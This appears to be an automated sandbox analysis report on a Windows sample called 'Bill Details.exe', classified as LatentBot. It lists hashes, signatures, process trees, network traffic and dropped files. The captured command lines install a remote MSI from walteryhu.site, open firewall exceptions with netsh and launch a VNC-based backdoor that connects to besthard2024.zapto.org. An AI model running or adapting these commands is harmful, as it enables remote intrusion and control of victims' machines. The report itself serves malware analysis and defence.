Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    09/10/2024, 19:20 UTC

General

  • Target

    Bill Details.exe

  • Size

    3.9MB

  • MD5

    f9fdaa73953ce9a148bc4b465ab1408f

  • SHA1

    a2f259b8f8ddfae8994eb8200b8d89c256ddc13d

  • SHA256

    0f6c99a0e331ab6eae07a1d98a80d839f8c2e025bd17a587a6c5eead001acc38

  • SHA512

    889440392c11a0de283d6bf32ec4ba2c3e9aca463b7f96562815e1c2e06b1fe1f0a719896bfbb158ca7c1d557120fa73c82576f987ac76b28a0b8e598c111466

  • SSDEEP

    98304:6tlEb9+zykLmOCYNW/WrHwOnvE8sJXcMv5ezs2rEPqtxLA:6tSb9+zykLmxd/cHwOkp7uA

Malware Config

Extracted

Family

latentbot

C2

besthard2024.zapto.org

Signatures

  • LatentBot

    Modular trojan written in Delphi which has been in-the-wild since 2013.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 10 IoCs
  • Disables Windows logging functionality 2 TTPs

    Changes registry settings to disable Windows Event logging.

  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Bill Details.exe
    "C:\Users\Admin\AppData\Local\Temp\Bill Details.exe"
    1⤵
    • Enumerates connected drives
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2532
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\system32\msiexec.exe" /i https://www.walteryhu.site/PrintViewer.msi AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\Bill Details.exe" SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1728242176 "
      2⤵
      • Use of msiexec (install) with remote resource
      • Blocklisted process makes network request
      • Enumerates connected drives
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      PID:2684
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\EXEC9A4.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1076
      • C:\Windows\SysWOW64\attrib.exe
        C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\AIEABEB.tmp"
        3⤵
        • System Location Discovery: System Language Discovery
        • Views/modifies file attributes
        PID:1772
      • C:\Windows\SysWOW64\attrib.exe
        C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEC9A4.bat"
        3⤵
        • System Location Discovery: System Language Discovery
        • Views/modifies file attributes
        PID:2424
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEC9A4.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2304
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" cls"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:912
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2632
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 89C0DB15C756BA18A4C2A48C24AAA8D0 C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:2236
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding A73C91170C73F98176F846D9C412719C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:2096
    • C:\Windows\Installer\MSIC922.tmp
      "C:\Windows\Installer\MSIC922.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1160
  • C:\Games\PrintDrivers.exe
    "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
    1⤵
    • Executes dropped EXE
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    PID:1640
  • C:\Windows\system32\cmd.exe
    cmd /c ""C:\Games\PrintDrivers.cmd" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:900
    • C:\Windows\system32\mode.com
      Mode 90,20
      2⤵
        PID:2232
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
        2⤵
          PID:1548
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2300
          • C:\Windows\system32\reg.exe
            Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
            3⤵
              PID:1996
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic process where (name="PrintDriver.exe") get commandline
            2⤵
              PID:2156
            • C:\Windows\system32\findstr.exe
              findstr /i "PrintDriver.exe"
              2⤵
                PID:2072
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"
                2⤵
                  PID:2652
                • C:\Windows\system32\cmd.exe
                  cmd
                  2⤵
                  • Loads dropped DLL
                  PID:2788
                  • C:\Windows\system32\mode.com
                    Mode 90,20
                    3⤵
                      PID:2976
                    • C:\Windows\system32\netsh.exe
                      netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:2904
                    • C:\Windows\system32\netsh.exe
                      netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:2728
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic process where (name="PrintDriver.exe") get commandline
                      3⤵
                        PID:532
                      • C:\Windows\system32\findstr.exe
                        findstr /i "PrintDriver.exe"
                        3⤵
                          PID:2924
                        • C:\Games\PrintDriver.exe
                          C:\Games\PrintDriver.exe -autoreconnect ID:5977412 -connect besthard2024.zapto.org:5500 -run
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:780
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        2⤵
                        • Delays execution with timeout.exe
                        PID:2956
                      • C:\Windows\system32\taskkill.exe
                        taskkill /im rundll32.exe /f
                        2⤵
                        • Kills process with taskkill
                        PID:2972
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        2⤵
                        • Delays execution with timeout.exe
                        PID:1388
                      • C:\Windows\system32\taskkill.exe
                        taskkill /im rundll32.exe /f
                        2⤵
                        • Kills process with taskkill
                        PID:2076
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        2⤵
                        • Delays execution with timeout.exe
                        PID:2212
                      • C:\Windows\system32\taskkill.exe
                        taskkill /im rundll32.exe /f
                        2⤵
                        • Kills process with taskkill
                        PID:2256
                      • C:\Games\PrintDrivers.exe
                        C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd
                        2⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        PID:1152
                    • C:\Windows\system32\cmd.exe
                      cmd /c ""C:\Games\driverhelp.cmd" "
                      1⤵
                        PID:1520
                        • C:\Windows\system32\mode.com
                          Mode 90,20
                          2⤵
                            PID:2160
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                            2⤵
                              PID:1324
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                              2⤵
                                PID:1936
                                • C:\Windows\system32\reg.exe
                                  Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                  3⤵
                                    PID:2712
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:1368
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:1320
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:1380
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:1864
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:2232
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:2288
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:2484

                              Network

                              • flag-us
                                DNS
                                www.walteryhu.site
                                msiexec.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                www.walteryhu.site
                                IN A
                                Response
                                www.walteryhu.site
                                IN A
                                172.67.189.166
                                www.walteryhu.site
                                IN A
                                104.21.73.104
                              • flag-us
                                GET
                                https://www.walteryhu.site/PrintViewer.msi
                                Bill Details.exe
                                Remote address:
                                172.67.189.166:443
                                Request
                                GET /PrintViewer.msi HTTP/1.1
                                Accept: */*
                                User-Agent: AdvancedInstaller
                                Host: www.walteryhu.site
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Response
                                HTTP/1.1 200 OK
                                Date: Wed, 09 Oct 2024 19:20:12 GMT
                                Content-Type: application/x-msdownload
                                Content-Length: 7064064
                                Connection: keep-alive
                                Last-Modified: Wed, 09 Oct 2024 10:42:36 GMT
                                ETag: "6bca00-62408e98ca980"
                                Accept-Ranges: bytes
                                cf-cache-status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QHFIbQnXk4xTVZ6Q1ZtOOow0udXNIsJbJPiDK7F288IQGT6wz%2B9tL0G23HEOH1j2%2FPo3yEhHWiMXtUUY2YQHCQKbciR8JvFjix4ghC38J%2FuOvS7lZAvRb0sBNqxb7BKZxG0Q2eE%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8d00ba046c23bd7c-LHR
                                alt-svc: h3=":443"; ma=86400
                              • flag-us
                                DNS
                                c.pki.goog
                                Bill Details.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                c.pki.goog
                                IN A
                                Response
                                c.pki.goog
                                IN CNAME
                                pki-goog.l.google.com
                                pki-goog.l.google.com
                                IN A
                                142.250.187.195
                              • flag-gb
                                GET
                                http://c.pki.goog/r/gsr1.crl
                                Bill Details.exe
                                Remote address:
                                142.250.187.195:80
                                Request
                                GET /r/gsr1.crl HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Microsoft-CryptoAPI/6.1
                                Host: c.pki.goog
                                Response
                                HTTP/1.1 200 OK
                                Accept-Ranges: bytes
                                Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                Cross-Origin-Resource-Policy: cross-origin
                                Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                Content-Length: 1739
                                X-Content-Type-Options: nosniff
                                Server: sffe
                                X-XSS-Protection: 0
                                Date: Wed, 09 Oct 2024 18:46:03 GMT
                                Expires: Wed, 09 Oct 2024 19:36:03 GMT
                                Cache-Control: public, max-age=3000
                                Age: 2049
                                Last-Modified: Mon, 07 Oct 2024 07:18:00 GMT
                                Content-Type: application/pkix-crl
                                Vary: Accept-Encoding
                              • flag-gb
                                GET
                                http://c.pki.goog/r/r4.crl
                                Bill Details.exe
                                Remote address:
                                142.250.187.195:80
                                Request
                                GET /r/r4.crl HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Microsoft-CryptoAPI/6.1
                                Host: c.pki.goog
                                Response
                                HTTP/1.1 200 OK
                                Accept-Ranges: bytes
                                Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                Cross-Origin-Resource-Policy: cross-origin
                                Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                Content-Length: 436
                                X-Content-Type-Options: nosniff
                                Server: sffe
                                X-XSS-Protection: 0
                                Date: Wed, 09 Oct 2024 19:13:45 GMT
                                Expires: Wed, 09 Oct 2024 20:03:45 GMT
                                Cache-Control: public, max-age=3000
                                Age: 387
                                Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                Content-Type: application/pkix-crl
                                Vary: Accept-Encoding
                              • flag-us
                                GET
                                https://www.walteryhu.site/PrintViewer.msi
                                Bill Details.exe
                                Remote address:
                                172.67.189.166:443
                                Request
                                GET /PrintViewer.msi HTTP/1.1
                                Accept: */*
                                User-Agent: AdvancedInstaller
                                Host: www.walteryhu.site
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Response
                                HTTP/1.1 200 OK
                                Date: Wed, 09 Oct 2024 19:20:12 GMT
                                Content-Type: application/x-msdownload
                                Content-Length: 7064064
                                Connection: keep-alive
                                Last-Modified: Wed, 09 Oct 2024 10:42:36 GMT
                                ETag: "6bca00-62408e98ca980"
                                Accept-Ranges: bytes
                                cf-cache-status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w1O%2Bgrz4nX4iGnGQRVsfbO5FHuDxI1rs9BVLtv%2Fwmzx%2FdKiidZZIbIOVl6dGsvDuj7TZ%2FKCJVSoNcbzwyjBfrJ%2FFF0gIwJQaCYQDHTgal4dc6fu4BFAVQZupu8MquyNpVqllXV0%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8d00ba071fb393f7-LHR
                                alt-svc: h3=":443"; ma=86400
                              • flag-us
                                GET
                                https://www.walteryhu.site/PrintViewer.msi
                                Bill Details.exe
                                Remote address:
                                172.67.189.166:443
                                Request
                                GET /PrintViewer.msi HTTP/1.1
                                Accept: */*
                                User-Agent: AdvancedInstaller
                                Host: www.walteryhu.site
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Response
                                HTTP/1.1 200 OK
                                Date: Wed, 09 Oct 2024 19:20:13 GMT
                                Content-Type: application/x-msdownload
                                Content-Length: 7064064
                                Connection: keep-alive
                                Last-Modified: Wed, 09 Oct 2024 10:42:36 GMT
                                ETag: "6bca00-62408e98ca980"
                                Accept-Ranges: bytes
                                cf-cache-status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYjcB2fapzEWmc%2F4Ur8%2F16GHrvKpy9BFNr4UDPIdm9La7ZNDLBXnwDYy4SAXvXi8kP0ZK9GYwF1kvaHGCUg9Ny0Z7tl5d9TwOkD52ymRpoOlnKepTFOzxFAS1vn210BkkUoZI2g%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8d00ba09cdf6cd4c-LHR
                                alt-svc: h3=":443"; ma=86400
                              • flag-us
                                GET
                                https://www.walteryhu.site/PrintViewer.msi
                                msiexec.exe
                                Remote address:
                                172.67.189.166:443
                                Request
                                GET /PrintViewer.msi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Windows Installer
                                Host: www.walteryhu.site
                                Response
                                HTTP/1.1 200 OK
                                Date: Wed, 09 Oct 2024 19:20:16 GMT
                                Content-Type: application/x-msdownload
                                Content-Length: 7064064
                                Connection: keep-alive
                                Last-Modified: Wed, 09 Oct 2024 10:42:36 GMT
                                ETag: "6bca00-62408e98ca980"
                                Accept-Ranges: bytes
                                cf-cache-status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U3cjTDXJSdVzUvcWbeNdE%2FgrzQvrUfLfGndLGGJvTMInjtWcO43AtRMTGoyGx8WPVg4XU%2FXbdOpIo7%2BuGFAA%2BGseZvF11xcW0rf6fGxLgbjvYTTsOvR5NhtyBNX%2B%2Bq%2F0lyKdv2I%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8d00ba1ffafca62a-LHR
                                alt-svc: h3=":443"; ma=86400
                              • flag-us
                                DNS
                                besthard2024.zapto.org
                                PrintDriver.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                besthard2024.zapto.org
                                IN A
                                Response
                                besthard2024.zapto.org
                                IN A
                                94.156.104.60
                              • flag-us
                                DNS
                                crl.microsoft.com
                                Remote address:
                                8.8.8.8:53
                                Request
                                crl.microsoft.com
                                IN A
                                Response
                                crl.microsoft.com
                                IN CNAME
                                crl.www.ms.akadns.net
                                crl.www.ms.akadns.net
                                IN CNAME
                                a1363.dscg.akamai.net
                                a1363.dscg.akamai.net
                                IN A
                                2.19.117.18
                                a1363.dscg.akamai.net
                                IN A
                                2.19.117.22
                              • flag-gb
                                GET
                                http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
                                Remote address:
                                2.19.117.18:80
                                Request
                                GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
                                User-Agent: Microsoft-CryptoAPI/6.1
                                Host: crl.microsoft.com
                                Response
                                HTTP/1.1 200 OK
                                Content-Length: 1036
                                Content-Type: application/octet-stream
                                Content-MD5: 8M9bF5Tsp81z+cAg2quO8g==
                                Last-Modified: Thu, 26 Sep 2024 02:21:11 GMT
                                ETag: 0x8DCDDD1E3AF2C76
                                Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                x-ms-request-id: b28c4ea1-d01e-0016-0ebc-0fa13d000000
                                x-ms-version: 2009-09-19
                                x-ms-lease-status: unlocked
                                x-ms-blob-type: BlockBlob
                                Date: Wed, 09 Oct 2024 19:20:42 GMT
                                Connection: keep-alive
                              • 172.67.189.166:443
                                https://www.walteryhu.site/PrintViewer.msi
                                tls, http
                                Bill Details.exe
                                1.3kB
                                19.4kB
                                18
                                24

                                HTTP Request

                                GET https://www.walteryhu.site/PrintViewer.msi

                                HTTP Response

                                200
                              • 142.250.187.195:80
                                http://c.pki.goog/r/r4.crl
                                http
                                Bill Details.exe
                                606 B
                                5.0kB
                                8
                                6

                                HTTP Request

                                GET http://c.pki.goog/r/gsr1.crl

                                HTTP Response

                                200

                                HTTP Request

                                GET http://c.pki.goog/r/r4.crl

                                HTTP Response

                                200
                              • 172.67.189.166:443
                                https://www.walteryhu.site/PrintViewer.msi
                                tls, http
                                Bill Details.exe
                                1.6kB
                                19.4kB
                                23
                                24

                                HTTP Request

                                GET https://www.walteryhu.site/PrintViewer.msi

                                HTTP Response

                                200
                              • 172.67.189.166:443
                                https://www.walteryhu.site/PrintViewer.msi
                                tls, http
                                Bill Details.exe
                                161.1kB
                                7.3MB
                                3140
                                5260

                                HTTP Request

                                GET https://www.walteryhu.site/PrintViewer.msi

                                HTTP Response

                                200
                              • 172.67.189.166:443
                                https://www.walteryhu.site/PrintViewer.msi
                                tls, http
                                msiexec.exe
                                237.0kB
                                7.3MB
                                3938
                                5280

                                HTTP Request

                                GET https://www.walteryhu.site/PrintViewer.msi

                                HTTP Response

                                200
                              • 94.156.104.60:5500
                                besthard2024.zapto.org
                                PrintDriver.exe
                                1.0kB
                                768 B
                                17
                                15
                              • 127.0.0.1:5900
                                PrintDriver.exe
                              • 2.19.117.18:80
                                http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
                                http
                                399 B
                                1.7kB
                                4
                                4

                                HTTP Request

                                GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

                                HTTP Response

                                200
                              • 8.8.8.8:53
                                www.walteryhu.site
                                dns
                                msiexec.exe
                                64 B
                                96 B
                                1
                                1

                                DNS Request

                                www.walteryhu.site

                                DNS Response

                                172.67.189.166
                                104.21.73.104

                              • 8.8.8.8:53
                                c.pki.goog
                                dns
                                Bill Details.exe
                                56 B
                                107 B
                                1
                                1

                                DNS Request

                                c.pki.goog

                                DNS Response

                                142.250.187.195

                              • 8.8.8.8:53
                                besthard2024.zapto.org
                                dns
                                PrintDriver.exe
                                68 B
                                84 B
                                1
                                1

                                DNS Request

                                besthard2024.zapto.org

                                DNS Response

                                94.156.104.60

                              • 8.8.8.8:53
                                crl.microsoft.com
                                dns
                                63 B
                                162 B
                                1
                                1

                                DNS Request

                                crl.microsoft.com

                                DNS Response

                                2.19.117.18
                                2.19.117.22

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Config.Msi\f76c786.rbs

                                Filesize

                                422KB

                                MD5

                                16cc2a71edf33537200927aebbdfd7e8

                                SHA1

                                023f1a2c3c45aa3a6c63bafa19be6b52f84d3a8e

                                SHA256

                                43533d0477a914cdf44d0df9ad97b650d629c81b2f9f605321530d5315e66913

                                SHA512

                                80811911300020dfc3e3ddef82853b40429f3bda1e8882c9138791859b0461e20ddf0f7c0002d3c8008e0cf9e3f4f077c8a304736bb4521a91f7d58590045ff3

                              • C:\Games\PrintDriver.txt

                                Filesize

                                1KB

                                MD5

                                6eb13f7936a83f4c44842029914aad6e

                                SHA1

                                7b9b27731d4ca6f996ce68c5d68b4d653e31d915

                                SHA256

                                8d9bb49947d9dc7fa7be7310149a99f13a0c02580fd996aae31c69d673775c49

                                SHA512

                                227788193867b2f99a62ae792d91562ad46ea3fa0855cf6ef28fc0de31d43f2e671c6ef50e534f0235f1f663769715bef162913a554e86e581fe05455373623e

                              • C:\Games\PrintDrivers.cmd

                                Filesize

                                1KB

                                MD5

                                eacc690f71a77685f030bef23b506b91

                                SHA1

                                03b911ba997d44028bf515ea44fe4813b4b4a785

                                SHA256

                                0f1d30740f2e46b22b86fb01acdabbd02440d7dbebe963a405fb3a5661b23263

                                SHA512

                                9870aa4dc699b74bfc8fb53df0c74686913f42ea2321bee39786e5be696fb081e3dfdac1b312f3c439c14e3061f35cefe820ef1ac5c853274ca0c867bf50a54d

                              • C:\Games\PrintDrivers.exe

                                Filesize

                                403KB

                                MD5

                                29ed7d64ce8003c0139cccb04d9af7f0

                                SHA1

                                8172071a639681934d3dc77189eb88a04c8bcfac

                                SHA256

                                e48aac5148b261371c714b9e00268809832e4f82d23748e44f5cfbbf20ca3d3f

                                SHA512

                                4bdd4bf57eaf0c9914e483e160182db7f2581b0e2adc133885bf0f364123d849d247d3f077a58d930e80502a7f27f1457f7e2502d466aec80a4fbeebd0b59415

                              • C:\Games\UltraVNC.ini

                                Filesize

                                1KB

                                MD5

                                cb5b8a5789c15957c039ff3ce988c1a2

                                SHA1

                                4de9a626f04bc7c619fdb68e5585739855ded2d1

                                SHA256

                                a11a72865948a8d6a88df530108c3b8ba3e8b4ac6316ac22443af81fa1c3daf4

                                SHA512

                                68dd583237ea70702d76d9a2a607bbb8f2e2a1e4285de347b4e23faa0063b51f20f5a84cbe907ef4c123eba0add1c99cb4f9f1e13ddff97b34bb1e7c18825e32

                              • C:\Games\driverhelp.cmd

                                Filesize

                                870B

                                MD5

                                fd3b5847ddb8a31413951c0aa870ab95

                                SHA1

                                e3e91e3e9fa442cd1937422120de91da87973ddb

                                SHA256

                                e4f5e16dfe9bbe6d63f266103c35c0035a2d4014f516420190b7cfafb02b08ad

                                SHA512

                                5d8599f7d6f0824ab30118f5680bf89d28c1e7e9de4ed61af9074cb9d339619d59dab8e5818dc93dcf5b27ad9e8a863c5d082f8f829aa8c4a026ec5da2454096

                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                Filesize

                                342B

                                MD5

                                753c495cc6c85f69353e4dea8d28c613

                                SHA1

                                9cf7bec9a284123b6f9b2c714bf2703d9d860c2e

                                SHA256

                                be508c93f26ccaff29838a1dfaac2169352cfac13e99942349f4c126617fd813

                                SHA512

                                2147d4f56440b90fe4f73aeba521deb1c9ec7e11b6c5314548e592e4daaf61691e3e1f12c8c9c4260bd640b92c93c7b72dc69091a1c48a2e327d1e44b12f0805

                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                Filesize

                                342B

                                MD5

                                232f738aac698f1b035437e566817ba6

                                SHA1

                                eabf13ec1b8e9210486a945fd8d78d46f3ae8780

                                SHA256

                                47bd8f01a8e9b73055082f8e88d374d42880881001a9e375fb4d61a051f65477

                                SHA512

                                f90962f454b91153ad7dfa8a648259b26d30c511881d8282fd22428d182dfbd644946b45c6daeeb89409ea6c3cf469a9b66e6bbd6cfc9da7d34651b8012857c9

                              • C:\Users\Admin\AppData\Local\Temp\AIEABEB.tmp

                                Filesize

                                6.7MB

                                MD5

                                e21b2080c98beb0f04307a5a25630e23

                                SHA1

                                8fc24ad51e8d61324fe8de1be667862e9238cbbb

                                SHA256

                                0dbeaab616c483b81d9e9ed8dda14a3a8f3b024130f8fab840e7b9f3a7b1787e

                                SHA512

                                3706fde6569bccb39e2c58e86c60050c73bcdbe5c7eb05849ced33c75b5a1c3b080746c2e27420c6fffcd3497e1b1b6ab87e1b2d371a80fa3ae27851a64cfbea

                              • C:\Users\Admin\AppData\Local\Temp\CabB6A5.tmp

                                Filesize

                                70KB

                                MD5

                                49aebf8cbd62d92ac215b2923fb1b9f5

                                SHA1

                                1723be06719828dda65ad804298d0431f6aff976

                                SHA256

                                b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                SHA512

                                bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                              • C:\Users\Admin\AppData\Local\Temp\EXEC9A4.bat

                                Filesize

                                369B

                                MD5

                                1a882ccb67172a36f7e80d710ea09fd3

                                SHA1

                                8021ff845a39e43888aba493e462752dc2155667

                                SHA256

                                a89471a2101ae88db197cae158d367d7be5c11f8479818558fd3434a7e592b32

                                SHA512

                                473b0d7210525e216df2e9a66b4528bbcb21b7d0e28116b8fedfaf3b2f419a709eebae3c38646eb4b1d5b42a659e37a2a1ea8d34a61461090262a04027b44522

                              • C:\Users\Admin\AppData\Local\Temp\MSIB874.tmp

                                Filesize

                                997KB

                                MD5

                                ec6ebf65fe4f361a73e473f46730e05c

                                SHA1

                                01f946dfbf773f977af5ade7c27fffc7fe311149

                                SHA256

                                d3614d7bece53e0d408e31da7d9b0ff2f7285a7dd544c778847ed0c5ded5d52f

                                SHA512

                                e4d7aafa75d07a3071d2739d18b4c2b0a3798f754b339c349db9a6004d031bf02f3970b030cec4a5f55b4c19f03794b0ce186a303d936c222e7e6e8726fffff7

                              • C:\Users\Admin\AppData\Local\Temp\TarB6B8.tmp

                                Filesize

                                181KB

                                MD5

                                4ea6026cf93ec6338144661bf1202cd1

                                SHA1

                                a1dec9044f750ad887935a01430bf49322fbdcb7

                                SHA256

